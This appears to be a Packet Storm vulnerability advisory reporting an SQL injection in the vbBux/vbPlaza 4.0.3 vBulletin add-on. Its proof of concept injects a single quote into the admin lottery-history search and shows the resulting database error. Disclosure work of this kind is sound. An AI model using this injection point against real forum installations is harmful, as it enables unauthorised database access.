vbBux / vbPlaza version 4.0.3 suffers from a remote SQL injection vulnerability.
60d34baba3032357c8f4c140195265873cbe3acd91d1fd2d312b54877a0c9f04# Exploit Title: vbBux and vbPlaza v4 SQLI
#
# Author(s): n3tw0rk (twiiter.com/n3tw0rkgod)
#
# Contact: Mail:infectedelite@gmail.com
#
# Product: 4.0.3 and below
#
# Software Version x.x.x
#
# Product Download:
http://www.vbulletin.org/forum/showthread.php?t=270271#
# Homepage: d4tabase.com
#
_____________________________________________________________#
The exploit is caused due to a variable named 'vbplaza_lottery_history' not
being sanitized before being used within an insert into statement.
POC
You will need Admincp Access then go to
http://localhost/admincp/vbplaza_lottery.php?do=searchhistory then in the
force read order column put a
' into the search bar and result should show
Database error in vBulletin 4.2.1:
Invalid SQL:
Database error in vBulletin 4.2.1
Invalid SQL:
SELECT COUNT(*) AS count
FROM vbplaza_lottery_history
WHERE 1=1 AND (lotteryid = ');
MySQL Error : You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use near
'')' at line 3
Error Number : 1064
Request Date : Sunday, August 11th 2013 @ 05:17:53 PM
Error Date : Sunday, August 11th 2013 @ 05:17:54 PM
Script : http://localhost/admincp/vbplaza_lottery.php?do=findhistory
Referrer :
http://localhost/admincp/vbplaza_lottery.php?do=searchhistory
IP Address : ::1
Username : n3tw0rk
Classname : vB_Database
MySQL Version : 5.5.27
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed